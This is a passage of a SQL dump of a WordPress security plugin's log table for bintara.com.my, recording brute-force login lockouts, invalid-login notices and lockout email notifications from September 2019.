empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYCE3kXpgmG5P@iB8kOzAAAAIo\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"46.45.160.75\";s:11:\"REMOTE_PORT\";s:5:\"60778\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYCE3kXpgmG5P@iB8kOzAAAAIo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569063443.5995\";s:12:\"REQUEST_TIME\";s:10:\"1569063443\";}}','notice','2019-09-21 10:57:25','2019-09-21 10:57:23',17799616,19289168,'https://bintara.com.my/blog/wp-login.php',1,0,'46.45.160.75'),(25392,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:57:15\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:57:15\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:12:15\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:12:15\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:57:16','2019-09-21 10:57:15',17883216,19288520,'https://bintara.com.my/wordpress/wp-login.php',1,0,'178.62.221.116'),(25389,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:56:20\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:56:20\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:11:20\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:11:20\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:56:21','2019-09-21 10:56:20',17884648,19289464,'https://bintara.com.my/test/wp-login.php',1,0,'103.1.239.217'),(25390,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:56:21','2019-09-21 10:56:20',18090456,19289464,'https://bintara.com.my/test/wp-login.php',1,0,'103.1.239.217'),(25391,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYCCjDrcQxTmGrCWuaJNgAAAcU\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"178.62.221.116\";s:11:\"REMOTE_PORT\";s:5:\"34237\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYCCjDrcQxTmGrCWuaJNgAAAcU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569063434.9437\";s:12:\"REQUEST_TIME\";s:10:\"1569063434\";}}','notice','2019-09-21 10:57:16','2019-09-21 10:57:15',17798408,19288520,'https://bintara.com.my/wordpress/wp-login.php',1,0,'178.62.221.116'),(25386,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:55:38\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:55:38\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:10:38\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:10:38\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:55:39','2019-09-21 10:55:38',17884648,19289464,'https://bintara.com.my/2019/wp-login.php',1,0,'185.148.82.88'),(25387,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:55:39','2019-09-21 10:55:38',18090456,19289464,'https://bintara.com.my/2019/wp-login.php',1,0,'185.148.82.88'),(25388,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYB01iJ7D9Gn7wDPh8VNgAAAMQ\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"103.1.239.217\";s:11:\"REMOTE_PORT\";s:5:\"50014\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYB01iJ7D9Gn7wDPh8VNgAAAMQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569063379.9447\";s:12:\"REQUEST_TIME\";s:10:\"1569063379\";}}','notice','2019-09-21 10:56:21','2019-09-21 10:56:20',17799888,19289464,'https://bintara.com.my/test/wp-login.php',1,0,'103.1.239.217'),(25384,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:55:19','2019-09-21 10:55:18',18088056,19287808,'https://bintara.com.my/wordpress/wp-login.php',1,0,'103.254.209.198'),(25385,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYBqXkXpgmG5P@iB8kOOwAAAJY\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"185.148.82.88\";s:11:\"REMOTE_PORT\";s:5:\"52278\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYBqXkXpgmG5P@iB8kOOwAAAJY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569063337.6394\";s:12:\"REQUEST_TIME\";s:10:\"1569063337\";}}','notice','2019-09-21 10:55:39','2019-09-21 10:55:38',17799888,19289464,'https://bintara.com.my/2019/wp-login.php',1,0,'185.148.82.88'),(25383,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:55:18\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:55:18\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:10:18\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:10:18\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:55:19','2019-09-21 10:55:18',17882440,19287808,'https://bintara.com.my/wordpress/wp-login.php',1,0,'103.254.209.198'),(25380,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:54:50\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:54:50\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:09:50\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:09:50\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:54:50','2019-09-21 10:54:50',17882184,19287040,'https://bintara.com.my/wp/wp-login.php',1,0,'176.9.74.214'),(25381,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:54:50','2019-09-21 10:54:50',18088072,19287040,'https://bintara.com.my/wp/wp-login.php',1,0,'176.9.74.214'),(25382,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYBlnkXpgmG5P@iB8kOIgAAAIs\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"103.254.209.198\";s:11:\"REMOTE_PORT\";s:5:\"55000\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYBlnkXpgmG5P@iB8kOIgAAAIs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569063318.2713\";s:12:\"REQUEST_TIME\";s:10:\"1569063318\";}}','notice','2019-09-21 10:55:19','2019-09-21 10:55:18',17797712,19287808,'https://bintara.com.my/wordpress/wp-login.php',1,0,'103.254.209.198'),(25377,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:54:39\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:54:39\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:09:39\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:09:39\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:54:40','2019-09-21 10:54:39',17885656,19291224,'https://bintara.com.my/blog/wp-login.php',1,0,'155.4.96.83'),(25378,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:54:40','2019-09-21 10:54:39',18091424,19291224,'https://bintara.com.my/blog/wp-login.php',1,0,'155.4.96.83'),(25379,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYBeXkXpgmG5P@iB8kN-AAAAIA\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"176.9.74.214\";s:11:\"REMOTE_PORT\";s:5:\"45763\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"T